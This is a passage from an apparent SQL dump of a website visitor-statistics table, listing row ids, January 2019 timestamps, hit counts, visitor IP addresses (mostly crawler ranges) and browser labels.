6.249.75.22','chrome'),(369609,1547335951,1,1,0,0,'46.229.168.146','other'),(369610,1547336026,1,1,0,0,'54.36.148.138','other'),(369611,1547336427,1,1,0,0,'54.36.148.183','other'),(369612,1547336548,1,1,0,0,'54.36.148.16','other'),(369613,1547336608,4,4,0,0,'216.244.66.241','other'),(369614,1547336777,1,1,0,0,'66.249.69.219','chrome'),(369616,1547336797,1,1,0,0,'157.55.39.110','other'),(369617,1547336938,1,1,0,0,'66.249.75.16','chrome'),(369618,1547336939,2,2,0,0,'66.249.75.22','chrome'),(369619,1547337112,1,1,0,0,'54.36.148.30','other'),(369620,1547337192,1,1,0,0,'54.36.149.17','other'),(369621,1547337233,1,1,0,0,'54.36.148.120','other'),(369622,1547337274,1,1,0,0,'54.36.148.127','other'),(369623,1547337670,1,1,0,0,'54.36.149.38','other'),(369624,1547337675,2,2,0,0,'66.249.75.21','chrome'),(369625,1547337702,2,2,0,0,'216.244.66.241','other'),(369626,1547337712,1,1,0,0,'54.36.149.11','other'),(369627,1547337721,1,1,0,0,'54.36.148.228','other'),(369628,1547337736,1,1,0,0,'66.249.75.17','chrome'),(369629,1547337863,1,1,0,0,'66.249.75.20','chrome'),(369630,1547338091,1,1,0,0,'157.55.39.110','other'),(369631,1547338204,1,1,0,0,'13.66.139.0','other'),(369632,1547338235,3,3,0,0,'157.55.39.140','other'),(369633,1547338245,1,1,0,0,'54.36.148.52','other'),(369634,1547338297,1,1,0,0,'54.36.148.212','other'),(369635,1547338750,1,1,0,0,'66.249.69.200','chrome'),(369636,1547338792,1,1,0,0,'66.249.75.17','chrome'),(369638,1547338860,4,4,0,0,'91.209.11.236','other'),(369639,1547338875,1,1,0,0,'54.36.149.48','other'),(369640,1547338945,1,1,0,0,'54.36.148.47','other'),(369641,1547339271,1,1,0,0,'54.36.149.45','other'),(369642,1547339371,1,1,0,0,'66.249.75.21','chrome'),(369643,1547339402,9,9,0,0,'216.244.66.241','other'),(369644,1547339490,1,1,0,0,'54.36.148.241','other'),(369645,1547339721,2,2,0,0,'178.154.244.11','other'),(369646,1547339725,1,1,0,0,'54.36.148.181','other'),(369647,1547339794,2,2,0,0,'5.45.207.19','other'),(369648,1547339919,1,1,0,0,'46.229.168.138','other'),(369649,1547340061,1,1,0,0,'54.36.148.172','other'),(369650,1547340096,1,1,0,0,'88.99.2.203','other'),(369651,1547340100,1,1,0,0,'54.36.148.78','other'),(369652,1547340130,1,1,0,0,'54.36.148.15','other'),(369653,1547340252,1,1,0,0,'54.36.148.115','other'),(369654,1547340342,1,1,0,0,'54.36.148.32','other'),(369655,1547340411,1,1,0,0,'157.55.39.110','other'),(369656,1547340539,1,1,0,0,'46.229.168.132','other'),(369657,1547340565,1,1,0,0,'46.229.168.130','other'),(369658,1547340736,1,1,0,0,'66.249.75.22','chrome'),(369659,1547340920,1,1,0,0,'51.15.34.214','other'),(369660,1547340930,1,1,0,0,'51.15.106.67','other'),(369661,1547341196,1,1,0,0,'66.249.75.21','chrome'),(369662,1547341205,1,1,0,0,'54.36.148.86','other'),(369663,1547341273,2,2,0,0,'216.244.66.241','other'),(369664,1547341382,1,1,0,0,'54.36.148.243','other'),(369665,1547341499,1,1,0,0,'8.29.198.27','other'),(369666,1547341628,1,1,0,0,'54.36.149.91','other'),(369667,1547342136,1,1,0,0,'157.55.39.79','other'),(369668,1547342183,6,6,0,0,'216.244.66.241','other'),(369669,1547342475,1,1,0,0,'66.249.75.22','chrome'),(369670,1547342490,1,1,0,0,'66.249.69.202','chrome'),(369671,1547342528,1,1,0,0,'66.249.69.204','chrome'),(369672,1547342556,1,1,0,0,'8.29.198.25','other'),(369673,1547342594,2,2,0,0,'66.249.69.200','chrome'),(369674,1547342783,1,1,0,0,'54.36.149.26','other'),(369675,1547342904,1,1,0,0,'54.36.148.16','other'),(369676,1547343240,1,1,0,0,'54.36.148.99','other'),(369677,1547343518,1,1,0,0,'54.36.149.9','other'),(369678,1547343539,1,1,0,0,'54.82.55.233','other'),(369679,1547343639,1,1,0,0,'54.36.149.23','other'),(369680,1547343715,1,1,0,0,'66.249.75.21','chrome'),(369681,1547343832,1,1,0,0,'66.249.69.200','chrome'),(369682,1547343918,2,2,0,0,'216.244.66.241','other'),(369683,1547343956,4,4,0,0,'66.249.75.20','chrome'),(369684,1547344111,1,1,0,0,'54.36.149.102','other'),(369685,1547344255,1,1,0,0,'46.229.168.132','other'),(369686,1547344617,1,1,0,0,'54.36.148.103','other'),(369687,1547344988,11,11,0,0,'216.244.66.241','other'),(369688,1547345536,1,1,0,0,'66.249.75.17','chrome'),(369689,1547345537,1,1,0,0,'66.249.75.22','chrome'),(369690,1547345593,1,1,0,0,'5.45.207.79','other'),(369691,1547345686,1,1,0,0,'66.249.69.204','chrome'),(369692,1547345932,1,1,0,0,'54.36.149.31','other'),(369693,1547346176,1,1,0,0,'157.55.39.110','other'),(369694,1547346296,1,1,0,0,'66.249.75.20','chrome'),(369695,1547346367,1,1,0,0,'46.229.168.132','other'),(369696,1547346369,1,1,0,0,'46.229.168.130','other'),(369697,1547346587,1,1,0,0,'66.249.75.17','chrome'),(369698,1547346790,1,1,0,0,'66.249.75.21','chrome'),(369699,1547346811,1,1,0,0,'46.229.168.152','other'),(369700,1547346979,5,5,0,0,'216.244.66.241','other'),(369701,1547347001,1,1,0,0,'54.36.148.224','other'),(369702,1547347226,1,1,0,0,'54.36.148.171','other'),(369703,1547347287,1,1,0,0,'54.36.149.49','other'),(369704,1547347325,1,1,0,0,'157.55.39.79','other'),(369705,1547347547,1,1,0,0,'54.36.149.33','other'),(369706,1547347718,2,2,0,0,'52.37.113.165','chrome'),(369707,1547347788,6,6,0,0,'91.209.11.236','other'),(369708,1547347816,1,1,0,0,'54.36.148.237','other'),(369709,1547347855,1,1,0,0,'54.36.149.100','other'),(369710,1547347870,1,1,0,0,'54.36.148.90','other'),(369711,1547347955,1,1,0,0,'54.36.148.102','other'),(369712,1547347989,3,3,0,0,'216.244.66.241','other'),(369713,1547347995,1,1,0,0,'46.229.168.138','other'),(369714,1547348253,1,1,0,0,'5.45.207.79','other'),(369715,1547348335,1,1,0,0,'54.36.149.64','other'),(369716,1547348389,1,1,0,0,'37.9.113.103','other'),(369717,1547348468,1,1,0,0,'54.36.148.187','other'),(369718,1547348557,1,1,0,0,'54.36.148.86','other'),(369719,1547348844,1,1,0,0,'54.36.149.102','other'),(369720,1547349099,2,2,0,0,'66.249.75.22','chrome'),(369721,1547349441,1,1,0,0,'54.36.148.74','other'),(369722,1547349479,1,1,0,0,'178.154.244.11','other'),(369723,1547349760,1,1,0,0,'54.82.55.233','other'),(369724,1547349820,1,1,0,0,'54.36.148.150','other'),(369725,1547349827,1,1,0,0,'46.229.168.145','other'),(369726,1547349867,1,1,0,0,'54.36.149.95','other'),(369727,1547349946,1,1,0,0,'66.249.69.200','chrome'),(369728,1547349963,1,1,0,0,'5.9.98.178','other'),(369729,1547350197,1,1,0,0,'54.36.148.98','other'),(369730,1547350222,1,1,0,0,'54.36.148.71','other'),(369731,1547350422,1,1,0,0,'54.36.148.22','other'),(369732,1547350494,1,1,0,0,'54.36.148.175','other'),(369733,1547350601,14,14,0,0,'216.244.66.241','other'),(369734,1547350640,1,1,0,0,'54.36.148.141','other'),(369735,1547350687,2,2,0,0,'66.249.75.21','chrome'),(369736,1547350864,1,1,0,0,'5.9.98.178','other'),(369737,1547350914,1,1,0,0,'66.249.75.20','chrome'),(369738,1547351048,1,1,0,0,'46.229.168.133','other'),(369739,1547351056,1,1,0,0,'66.249.75.22','chrome'),(369740,1547351528,2,2,0,0,'66.249.69.202','chrome'),(369741,1547351571,1,1,0,0,'54.36.148.104','other'),(369742,1547351598,1,1,0,0,'54.36.148.123','other'),(369743,1547351622,1,1,0,0,'46.229.168.140','other'),(369744,1547351657,1,1,0,0,'54.36.148.147','other'),(369745,1547351709,1,1,0,0,'54.36.148.191','other'),(369746,1547351769,1,1,0,0,'54.36.149.76','other'),(369747,1547351779,1,1,0,0,'5.9.98.178','other'),(369748,1547352130,1,1,0,0,'54.36.148.168','other'),(369749,1547352313,1,1,0,0,'66.249.75.21','chrome'),(369750,1547352323,1,1,0,0,'8.29.198.27','other'),(369751,1547352411,1,1,0,0,'157.55.39.131','other'),(369752,1547352486,1,1,0,0,'66.249.75.20','chrome'),(369753,1547352511,1,1,0,0,'54.36.148.183','other'),(369754,1547352570,1,1,0,0,'46.229.168.141','other'),(369755,1547352700,1,1,0,0,'5.9.98.178','other'),(369756,1547353175,1,1,0,0,'46.229.168.142','other'),(369757,1547353177,1,1,0,0,'54.36.148.133','other'),(369758,1547353257,1,1,0,0,'54.36.149.50','other'),(369759,1547353280,1,1,0,0,'66.249.75.22','chrome'),(369760,1547353390,1,1,0,0,'8.29.198.25','other'),(369761,1547353395,8,8,0,0,'216.244.66.241','other'),(369762,1547353525,1,1,0,0,'54.36.148.252','other'),(369763,1547353601,1,1,0,0,'5.9.98.178','other'),(369764,1547353825,1,1,0,0,'5.45.207.19','other'),(369765,1547353827,1,1,0,0,'54.36.149.7','other'),(369766,1547354020,1,1,0,0,'157.55.13.65','other'),(369767,1547354049,2,2,0,0,'66.249.75.21','chrome'),(369768,1547354163,1,1,0,0,'54.36.149.6','other'),(369769,1547354424,1,1,0,0,'46.229.168.133','other'),(369770,1547354426,1,1,0,0,'46.229.168.139','other'),(369771,1547354502,1,1,0,0,'5.9.98.178','other'),(369772,1547354785,1,1,0,0,'54.36.148.116','other'),(369773,1547354906,1,1,0,0,'54.36.148.16','other'),(369774,1547355112,1,1,0,0,'66.249.75.16','chrome'),(369776,1547355340,1,1,0,0,'66.249.75.15','chrome'),(369777,1547355341,1,1,0,0,'66.249.75.21','chrome'),(369778,1547355386,1,1,0,0,'54.36.149.28','other'),(369779,1547355405,1,1,0,0,'5.9.98.178','other'),(369780,1547355546,1,1,0,0,'54.36.148.20','other'),(369781,1547355579,1,1,0,0,'54.36.148.228','other'),(369782,1547355767,4,4,0,0,'91.209.11.236','other'),(369783,1547355998,1,1,0,0,'157.55.39.110','other'),(369784,1547356151,13,13,0,0,'216.244.66.241','other'),(369785,1547356200,1,1,0,0,'54.36.148.61','other'),(369786,1547356266,4,4,0,0,'178.154.244.11','other'),(369787,1547356307,1,1,0,0,'5.9.98.178','other'),(369788,1547356437,1,1,0,0,'54.36.148.234','other'),(369789,1547356541,1,1,0,0,'66.249.75.17','chrome'),(369790,1547356542,1,1,0,0,'66.249.75.21','chrome'),(369791,1547356835,2,2,0,0,'5.45.207.79','other'),(369792,1547356845,1,1,0,0,'66.249.75.20','chrome'),(369793,1547356937,1,1,0,0,'46.229.168.154','other'),(369794,1547357210,1,1,0,0,'5.9.98.178','other'),(369795,1547357301,1,1,0,0,'66.249.69.202','chrome'),(369796,1547357436,1,1,0,0,'157.55.39.115','other'),(369797,1547357547,1,1,0,0,'54.36.148.220','other'),(369798,1547357825,1,1,0,0,'54.36.149.102','other'),(369799,1547357985,1,1,0,0,'216.244.66.241','other'),(369800,1547358112,1,1,0,0,'5.9.98.178','other'),(369801,1547358541,1,1,0,0,'66.249.75.22','chrome'),(369802,1547358624,1,1,0,0,'54.36.149.47','other'),(369803,1547358640,1,1,0,0,'54.36.148.30','other'),(369804,1547358891,1,1,0,0,'54.36.148.224','other'),(369805,1547358900,10,10,0,0,'216.244.66.241','other'),(369806,1547359022,1,1,0,0,'5.9.98.178','other'),(369807,1547359028,3,3,0,0,'66.249.75.21','chrome'),(369808,1547359175,1,1,0,0,'66.249.69.200','chrome'),(369809,1547359190,2,2,0,0,'178.63.26.245','other'),(369810,1547359252,1,1,0,0,'54.36.148.60','other'),(369811,1547359761,1,1,0,0,'54.36.148.15','other'),(369812,1547359942,1,1,0,0,'54.36.149.65','other'),(369813,1547360012,1,1,0,0,'54.36.148.157','other'),(369814,1547360079,1,1,0,0,'46.229.168.130','other'),(369815,1547360163,1,1,0,0,'157.55.39.115','other'),(369816,1547360195,1,1,0,0,'216.244.66.241','other'),(369817,1547360252,1,1,0,0,'54.36.149.20','other'),(369818,1547360332,1,1,0,0,'157.55.39.79','other'),(369819,1547360408,1,1,0,0,'54.36.148.179','other'),(369820,1547360481,1,1,0,0,'46.188.107.155','msie'),(369821,1547360636,1,1,0,0,'66.249.69.200','chrome'),(369822,1547360672,1,1,0,0,'157.55.39.62','other'),(369823,1547360943,1,1,0,0,'66.249.69.204','chrome'),(369824,1547360958,1,1,0,0,'54.36.148.83','other'),(369825,1547361055,1,1,0,0,'54.36.149.97','other'),(369826,1547361216,2,2,0,0,'54.82.55.233','other'),(369827,1547361537,1,1,0,0,'54.36.148.216','other'),(369828,1547361669,15,15,0,0,'216.244.66.241','other'),(369829,1547361760,1,1,0,0,'5.45.207.79','other'),(369830,1547361879,1,1,0,0,'66.249.75.20','chrome'),(369831,1547361940,1,1,0,0,'66.249.75.22','chrome'),(369832,1547362247,1,1,0,0,'54.36.148.137','other'),(369833,1547362573,1,1,0,0,'46.229.168.129','other'),(369834,1547362638,1,1,0,0,'54.36.148.26','other'),(369835,1547362733,2,2,0,0,'216.244.66.241','other'),(369836,1547362797,1,1,0,0,'66.249.69.202','chrome'),(369837,1547362985,1,1,0,0,'157.55.39.79','other'),(369838,1547363152,1,1,0,0,'66.249.69.145','chrome'),(369839,1547363153,2,2,0,0,'66.249.69.148','chrome'),(369840,1547363155,1,1,0,0,'8.29.198.26','other'),(369841,1547363207,2,2,0,0,'91.209.11.236','other'),(369842,1547363445,1,1,0,0,'54.36.148.141','other'),(369843,1547363597,3,3,0,0,'5.45.207.19','other'),(369844,1547363742,1,1,0,0,'54.36.149.81','other'),(369845,1547363866,1,1,0,0,'66.249.69.143','chrome'),(369847,1547363881,1,1,0,0,'178.154.171.17','other'),(369848,1547363956,2,2,0,0,'178.154.244.49','other'),(369849,1547363965,1,1,0,0,'141.8.142.38','other'),(369850,1547364021,1,1,0,0,'95.108.181.75','other'),(369851,1547364173,1,1,0,0,'66.249.69.204','chrome'),(369852,1547364222,1,1,0,0,'8.29.198.26','other'),(369853,1547364276,1,1,0,0,'54.36.148.208','other'),(369854,1547364367,1,1,0,0,'178.154.244.65','other'),(369855,1547364413,12,12,0,0,'216.244.66.241','other'),(369856,1547364432,2,2,0,0,'141.8.142.103','other'),(369857,1547364500,1,1,0,0,'5.255.253.25','other'),(369858,1547364522,1,1,0,0,'66.249.69.202','chrome'),(369859,1547364663,1,1,0,0,'141.8.142.144','other'),(369860,1547364677,1,1,0,0,'54.36.148.19','other'),(369861,1547364774,1,1,0,0,'213.180.203.9','other'),(369862,1547364841,3,3,0,0,'66.249.69.150','chrome'),(369863,1547365016,2,2,0,0,'95.163.255.64','other'),(369864,1547365073,1,1,0,0,'5.45.207.79','other'),(369865,1547365121,2,2,0,0,'91.209.11.236','other'),(369866,1547365408,1,1,0,0,'180.76.15.138','other'),(369867,1547365436,1,1,0,0,'66.249.69.221','chrome'),(369869,1547365596,1,1,0,0,'66.249.69.217','chrome'),(369870,1547365637,3,3,0,0,'46.229.168.151','other'),(369871,1547365666,1,1,0,0,'216.244.66.241','other'),(369872,1547365672,3,3,0,0,'157.55.39.79','other'),(369873,1547365695,1,1,0,0,'207.46.13.119','other'),(369874,1547365716,1,1,0,0,'54.36.148.48','other'),(369875,1547365723,3,3,0,0,'66.249.69.143','chrome'),(369876,1547365754,2,2,0,0,'66.249.69.145','chrome'),(369877,1547365796,1,1,0,0,'66.249.69.148','chrome'),(369878,1547365902,1,1,0,0,'66.249.69.150','chrome'),(369879,1547365967,1,1,0,0,'54.36.148.221','other'),(369880,1547365975,1,1,0,0,'54.36.149.45','other'),(369881,1547366058,1,1,0,0,'54.36.148.197','other'),(369882,1547366211,1,1,0,0,'54.36.148.77','other'),(369883,1547366382,2,2,0,0,'157.55.39.110','other'),(369884,1547366532,1,1,0,0,'157.55.39.115','other'),(369885,1547366989,1,1,0,0,'157.55.39.62','other'),(369886,1547367150,6,6,0,0,'216.244.66.241','other'),(369887,1547367294,1,1,0,0,'66.249.69.204','chrome'),(369888,1547367686,1,1,0,0,'54.36.148.73','other'),(369889,1547367763,1,1,0,0,'54.36.148.217','other'),(369890,1547367892,1,1,0,0,'66.249.69.149','chrome'),(369891,1547367978,1,1,0,0,'54.36.149.40','other'),(369892,1547368090,2,2,0,0,'66.249.69.148','chrome'),(369893,1547368353,2,2,0,0,'216.244.66.241','other'),(369894,1547368921,1,1,0,0,'54.36.149.67','other'),(369895,1547368942,1,1,0,0,'54.36.148.210','other'),(369896,1547369026,1,1,0,0,'66.249.69.143','chrome'),(369897,1547369027,2,2,0,0,'66.249.69.150','chrome'),(369898,1547369350,1,1,0,0,'54.36.148.232','other'),(369899,1547369468,1,1,0,0,'66.249.69.200','chrome'),(369900,1547369497,1,1,0,0,'46.229.168.133','other'),(369901,1547369728,2,2,0,0,'66.249.69.144','chrome'),(369902,1547369949,8,8,0,0,'216.244.66.241','other'),(369903,1547370302,3,3,0,0,'157.55.39.79','other'),(369904,1547370481,1,1,0,0,'66.249.69.150','chrome'),(369905,1547370523,1,1,0,0,'66.249.69.202','chrome'),(369906,1547370658,1,1,0,0,'54.36.148.251','other'),(369907,1547371271,4,4,0,0,'66.249.69.148','chrome'),(369908,1547371309,2,2,0,0,'178.154.244.11','other'),(369909,1547371432,1,1,0,0,'37.9.113.148','other'),(369910,1547371478,3,3,0,0,'66.249.69.150','chrome'),(369911,1547371559,1,1,0,0,'66.249.69.149','chrome'),(369912,1547371593,1,1,0,0,'5.255.253.38','other'),(369913,1547371596,1,1,0,0,'178.154.171.17','other'),(369914,1547371635,1,1,0,0,'66.249.69.145','chrome'),(369915,1547371639,1,1,0,0,'213.180.203.17','other'),(369916,1547371647,1,1,0,0,'66.249.69.143','chrome'),(369917,1547371670,1,1,0,0,'141.8.142.38','other'),(369918,1547371834,2,2,0,0,'207.46.13.140','other'),(369919,1547372196,1,1,0,0,'54.36.148.196','other'),(369920,1547372325,1,1,0,0,'37.9.113.103','other'),(369921,1547372396,1,1,0,0,'66.249.69.204','chrome'),(369922,1547372552,1,1,0,0,'87.250.224.47','other'),(369923,1547372667,11,11,0,0,'216.244.66.241','other'),(369924,1547372836,1,1,0,0,'54.36.148.119','other'),(369925,1547373117,1,1,0,0,'66.249.69.150','chrome'),(369926,1547373372,1,1,0,0,'54.36.148.230','other'),(369927,1547373402,1,1,0,0,'46.229.168.144','other'),(369928,1547373472,1,1,0,0,'66.249.69.148','chrome'),(369929,1547373691,1,1,0,0,'157.55.39.110','other'),(369930,1547373727,1,1,0,0,'51.255.65.46','other'),(369931,1547373818,1,1,0,0,'54.36.148.56','other'),(369932,1547373844,1,1,0,0,'157.55.39.115','other'),(369933,1547373884,1,1,0,0,'54.36.149.23','other'),(369934,1547373967,1,1,0,0,'54.36.149.30','other'),(369935,1547373984,1,1,0,0,'8.29.198.25','other'),(369936,1547373989,2,2,0,0,'157.55.39.207','other'),(369937,1547374045,2,2,0,0,'216.244.66.241','other'),(369938,1547374048,2,2,0,0,'54.36.148.160','other'),(369939,1547374052,1,1,0,0,'178.154.171.27','other'),(369940,1547374215,2,2,0,0,'157.55.39.159','other'),(369941,1547374409,1,1,0,0,'66.249.69.149','chrome'),(369942,1547374546,1,1,0,0,'157.55.39.79','other'),(369943,1547374866,1,1,0,0,'54.36.149.86','other'),(369944,1547375058,1,1,0,0,'8.29.198.26','other'),(369945,1547375125,1,1,0,0,'66.249.69.150','chrome'),(369946,1547375242,1,1,0,0,'54.36.149.31','other'),(369947,1547375456,13,13,0,0,'216.244.66.241','other'),(369948,1547375783,1,1,0,0,'46.229.168.149','other'),(369949,1547375940,1,1,0,0,'54.36.148.89','other'),(369950,1547376213,1,1,0,0,'54.36.148.146','other'),(369951,1547376303,1,1,0,0,'66.249.69.204','chrome'),(369952,1547376310,1,1,0,0,'66.249.69.202','chrome'),(369953,1547376675,1,1,0,0,'54.36.148.149','other'),(369954,1547376711,1,1,0,0,'54.36.148.47','other'),(369955,1547376763,1,1,0,0,'54.36.148.255','other'),(369956,1547377039,1,1,0,0,'66.249.69.150','chrome'),(369957,1547377077,1,1,0,0,'66.249.69.149','chrome'),(369958,1547377131,1,1,0,0,'54.36.149.16','other'),(369959,1547377312,1,1,0,0,'54.36.148.159','other'),(369960,1547377461,1,1,0,0,'54.36.149.93','other'),(369961,1547377563,1,1,0,0,'178.154.171.24','other'),(369962,1547377564,1,1,0,0,'95.108.181.54','other'),(369963,1547377570,1,1,0,0,'178.154.244.65','other'),(369964,1547377682,1,1,0,0,'54.36.148.62','other'),(369965,1547377689,1,1,0,0,'54.36.149.98','other'),(369966,1547377796,1,1,0,0,'54.36.149.2','other'),(369967,1547377838,1,1,0,0,'54.36.148.185','other'),(369968,1547377898,1,1,0,0,'178.154.244.11','other'),(369969,1547377942,1,1,0,0,'178.154.244.21','other'),(369970,1547377948,1,1,0,0,'141.8.142.103','other'),(369971,1547377995,1,1,0,0,'178.154.200.48','other'),(369972,1547378037,1,1,0,0,'46.229.168.148','other'),(369973,1547378197,1,1,0,0,'54.36.149.64','other'),(369974,1547378238,9,9,0,0,'216.244.66.241','other'),(369975,1547378363,1,1,0,0,'54.36.149.1','other'),(369976,1547378391,1,1,0,0,'66.249.69.149','chrome'),(369977,1547378874,2,2,0,0,'37.73.240.253','chrome'),(369978,1547379068,1,1,0,0,'66.249.69.144','chrome'),(369979,1547379069,3,3,0,0,'66.249.69.150','chrome'),(369980,1547379102,1,1,0,0,'54.36.149.41','other'),(369981,1547379173,1,1,0,0,'54.36.149.16','other'),(369982,1547379290,2,2,0,0,'216.244.66.241','other'),(369983,1547379440,1,1,0,0,'54.36.148.111','other'),(369984,1547379574,1,1,0,0,'54.36.148.39','other'),(369985,1547379742,1,1,0,0,'206.189.133.212','other'),(369986,1547379854,1,1,0,0,'54.36.149.64','other'),(369987,1547379897,1,1,0,0,'66.249.69.217','chrome'),(369988,1547379898,1,1,0,0,'66.249.69.202','chrome'),(369989,1547380162,1,1,0,0,'180.76.15.11','other'),(369990,1547380163,1,1,0,0,'180.76.15.156','other'),(369991,1547380578,1,1,0,0,'54.36.148.181','other'),(369992,1547380621,1,1,0,0,'54.36.148.74','other'),(369993,1547380637,1,1,0,0,'54.36.149.8','other'),(369994,1547381010,8,8,0,0,'216.244.66.241','other'),(369995,1547381298,1,1,0,0,'66.249.69.144','chrome'),(369997,1547381390,1,1,0,0,'54.36.148.210','other'),(369998,1547381517,1,1,0,0,'54.36.148.109','other'),(369999,1547381526,1,1,0,0,'54.36.148.123','other'),(370000,1547381532,1,1,0,0,'54.36.149.95','other'),(370001,1547381865,1,1,0,0,'46.229.168.135','other'),(370002,1547381913,1,1,0,0,'157.55.39.159','other'),(370003,1547381933,7,7,0,0,'216.244.66.241','other'),(370004,1547382061,1,1,0,0,'66.249.69.204','chrome'),(370005,1547382726,1,1,0,0,'66.249.69.202','chrome'),(370006,1547383058,1,1,0,0,'54.36.149.8','other'),(370007,1547383125,1,1,0,0,'207.46.13.195','other'),(370008,1547383143,1,1,0,0,'54.36.148.99','other'),(370009,1547383245,1,1,0,0,'54.36.148.66','other'),(370010,1547383336,1,1,0,0,'37.73.28.150','chrome'),(370011,1547383361,1,1,0,0,'91.196.177.147','firefox'),(370012,1547383391,1,1,0,0,'54.36.149.105','other'),(370013,1547383419,1,1,0,0,'157.55.39.159','other'),(370014,1547383481,1,1,0,0,'54.36.149.56','other'),(370015,1547383828,6,6,0,0,'216.244.66.241','other'),(370016,1547383837,1,1,0,0,'54.36.148.56','other'),(370017,1547384054,1,1,0,0,'54.36.148.98','other'),(370018,1547384077,2,2,0,0,'91.209.11.236','other'),(370019,1547384268,1,1,0,0,'54.36.148.190','other'),(370020,1547384277,1,1,0,0,'46.229.168.154','other'),(370021,1547384290,1,1,0,0,'46.229.168.143','other'),(370022,1547384292,1,1,0,0,'46.229.168.149','other'),(370023,1547384330,1,1,0,0,'91.196.178.173','chrome'),(370024,1547384369,1,1,0,0,'157.55.39.159','other'),(370025,1547384414,1,1,0,0,'87.250.224.65','other'),(370026,1547384441,1,1,0,0,'66.249.75.17','chrome'),(370027,1547384442,1,1,0,0,'66.249.75.20','chrome'),(370028,1547384443,1,1,0,0,'54.36.148.229','other'),(370029,1547384554,1,1,0,0,'5.45.207.79','other'),(370030,1547384822,1,1,0,0,'8.29.198.27','other'),(370031,1547384937,1,1,0,0,'54.36.149.93','other'),(370032,1547384942,1,1,0,0,'178.154.171.27','other'),(370033,1547384965,1,1,0,0,'141.8.142.65','other'),(370034,1547384968,1,1,0,0,'178.154.244.11','other'),(370035,1547385318,1,1,0,0,'54.36.149.43','other'),(370036,1547385324,2,2,0,0,'66.249.75.21','chrome'),(370037,1547385579,1,1,0,0,'46.229.168.147','other'),(370038,1547385580,1,1,0,0,'46.229.168.149','other'),(370039,1547385891,1,1,0,0,'8.29.198.27','other'),(370040,1547386124,1,1,0,0,'46.229.168.134','other'),(370041,1547386209,1,1,0,0,'54.36.149.4','other'),(370042,1547386258,1,1,0,0,'54.36.148.98','other'),(370043,1547386571,1,1,0,0,'46.229.168.137','other'),(370044,1547386579,4,4,0,0,'216.244.66.241','other'),(370045,1547386623,2,2,0,0,'66.249.75.20','chrome'),(370046,1547386633,1,1,0,0,'54.36.148.113','other'),(370047,1547386662,1,1,0,0,'66.249.69.202','chrome'),(370048,1547386820,1,1,0,0,'54.36.149.1','other'),(370049,1547386935,1,1,0,0,'37.204.75.254','chrome'),(370050,1547386983,1,1,0,0,'54.36.148.221','other'),(370051,1547387080,1,1,0,0,'66.249.75.16','chrome'),(370052,1547387591,4,4,0,0,'216.244.66.241','other'),(370053,1547387600,1,1,0,0,'207.46.13.21','other'),(370054,1547387618,1,1,0,0,'46.229.168.138','other'),(370055,1547388034,1,1,0,0,'54.36.149.35','other'),(370056,1547388379,1,1,0,0,'46.229.168.132','other'),(370057,1547388431,1,1,0,0,'46.229.168.145','other'),(370058,1547388565,1,1,0,0,'54.36.148.80','other'),(370059,1547388636,1,1,0,0,'54.36.148.47','other'),(370060,1547388945,1,1,0,0,'66.249.75.20','chrome'),(370061,1547388979,1,1,0,0,'13.66.139.0','other'),(370062,1547389118,1,1,0,0,'54.36.149.0','other'),(370063,1547389125,1,1,0,0,'54.36.148.192','other'),(370064,1547389356,12,12,0,0,'216.244.66.241','other'),(370065,1547389510,1,1,0,0,'54.36.148.166','other'),(370066,1547389604,1,1,0,0,'66.249.75.22','chrome'),(370067,1547389627,1,1,0,0,'54.36.149.88','other'),(370068,1547389794,1,1,0,0,'66.249.75.21','chrome'),(370069,1547389934,1,1,0,0,'54.36.148.146','other'),(370070,1547389976,1,1,0,0,'54.36.148.254','other'),(370071,1547390626,1,1,0,0,'216.244.66.241','other'),(370072,1547390678,1,1,0,0,'54.36.149.35','other'),(370073,1547390733,1,1,0,0,'163.172.182.111','firefox'),(370074,1547390880,1,1,0,0,'54.36.148.139','other'),(370075,1547390924,1,1,0,0,'66.249.69.202','chrome'),(370076,1547390962,1,1,0,0,'157.55.39.99','other'),(370077,1547391118,1,1,0,0,'95.108.181.75','other'),(370078,1547391282,1,1,0,0,'46.229.168.150','other'),(370079,1547391386,1,1,0,0,'54.36.148.76','other'),(370080,1547391578,1,1,0,0,'54.36.148.81','other'),(370081,1547391662,1,1,0,0,'95.108.213.4','other'),(370082,1547391814,1,1,0,0,'213.180.203.9','other'),(370083,1547391868,1,1,0,0,'66.249.75.20','chrome'),(370084,1547391903,2,2,0,0,'178.154.244.11','other'),(370085,1547392159,3,3,0,0,'216.244.66.241','other'),(370086,1547392323,1,1,0,0,'5.255.253.38','other'),(370087,1547392376,1,1,0,0,'54.36.149.81','other'),(370088,1547392413,1,1,0,0,'54.36.149.80','other'),(370089,1547392561,1,1,0,0,'54.36.148.36','other'),(370090,1547392626,1,1,0,0,'54.36.148.241','other'),(370091,1547392814,1,1,0,0,'54.36.149.87','other'),(370092,1547393022,1,1,0,0,'54.36.149.15','other'),(370093,1547393080,2,2,0,0,'157.55.39.159','other'),(370094,1547393084,1,1,0,0,'66.249.69.219','chrome'),(370095,1547393085,1,1,0,0,'66.249.69.202','chrome'),(370096,1547393158,11,11,0,0,'216.244.66.241','other'),(370097,1547393443,1,1,0,0,'54.36.148.198','other'),(370098,1547393658,1,1,0,0,'178.154.200.48','other'),(370099,1547393661,1,1,0,0,'141.8.183.22','other'),(370100,1547393778,1,1,0,0,'54.36.149.24','other'),(370101,1547393965,1,1,0,0,'207.46.13.146','other'),(370102,1547393975,2,2,0,0,'66.249.75.20','chrome'),(370103,1547394081,1,1,0,0,'54.36.148.195','other'),(370104,1547394101,1,1,0,0,'54.36.149.59','other'),(370105,1547394189,1,1,0,0,'66.249.69.221','chrome'),(370106,1547394190,1,1,0,0,'66.249.69.204','chrome'),(370107,1547394308,1,1,0,0,'66.249.75.17','chrome'),(370108,1547394953,1,1,0,0,'207.46.13.146','other'),(370109,1547394982,8,8,0,0,'216.244.66.241','other'),(370110,1547395199,1,1,0,0,'54.36.148.59','other'),(370111,1547395267,1,1,0,0,'54.36.149.84','other'),(370112,1547395655,1,1,0,0,'8.29.198.25','other'),(370113,1547395670,1,1,0,0,'54.36.148.234','other'),(370114,1547395944,2,2,0,0,'46.211.27.137','chrome'),(370115,1547395990,8,8,0,0,'216.244.66.241','other'),(370116,1547396165,1,1,0,0,'66.249.69.217','chrome'),(370117,1547396166,1,1,0,0,'66.249.69.200','chrome'),(370118,1547396249,1,1,0,0,'54.36.148.246','other'),(370119,1547396676,1,1,0,0,'207.46.13.146','other'),(370120,1547396723,1,1,0,0,'8.29.198.27','other'),(370121,1547397045,1,1,0,0,'54.36.148.13','other'),(370122,1547397679,1,1,0,0,'54.36.148.15','other'),(370123,1547397787,2,2,0,0